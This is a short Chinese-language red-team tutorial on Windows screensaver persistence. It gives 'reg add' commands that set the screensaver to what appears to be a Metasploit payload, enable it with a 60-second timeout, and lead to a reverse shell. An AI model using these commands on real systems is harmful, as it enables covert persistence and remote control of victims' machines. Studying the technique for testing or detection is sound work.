利用原理

        攻击者可以通过执行由用户不活动触发的恶意内容来建立持久性。屏幕保护程序是用户在可配置的不活动时间后执行的程序,由可移植可执行(PE)文件组成,扩展名为.scr。但是由于.src和.exe都是可执行程序,所以用exe也是可以实现的。Windows屏幕保护程序scrnsave.scr位于64位Windows系统的C:\Windows\System32和C:\Windows\sysWOW64中。

  • 以下是屏幕保护程序存储在注册表(HKCU\Control Panel\Desktop\)中的设置项:

    • SCRNSAVE.exe- 设置为恶意PE路径

    • ScreenSaveActive-设置为“1”以启用屏幕保护程序

    • ScreenSaverIsSecure-设置为“0”以无需密码解锁

    • ScreenSaveTimeout-在执行屏幕保护程序之前设置用户不活动超时

利用步骤

  • 步骤一:直接通过cmd.exe的方式写入键值。
1
2
3
reg add "hkcu\Control Panel\Desktop" /v "SCRNSAVE.exe" /d "C:\Windows\SysWOW64\msf4445.exe"
reg add "hkcu\Control Panel\Desktop" /v "ScreenSaveActive" /d "1"
reg add "hkcu\Control Panel\Desktop" /v  "ScreenSaveTimeout" /d "60"
image.png

配置完毕后,桌面右键->个性化,你会发现:

image.png
  • 步骤二:等待60秒后反弹shell,但是经过测试发现你需要人工点一下启动屏幕保护程序,然后再指定恶意程序所在位置才会生效。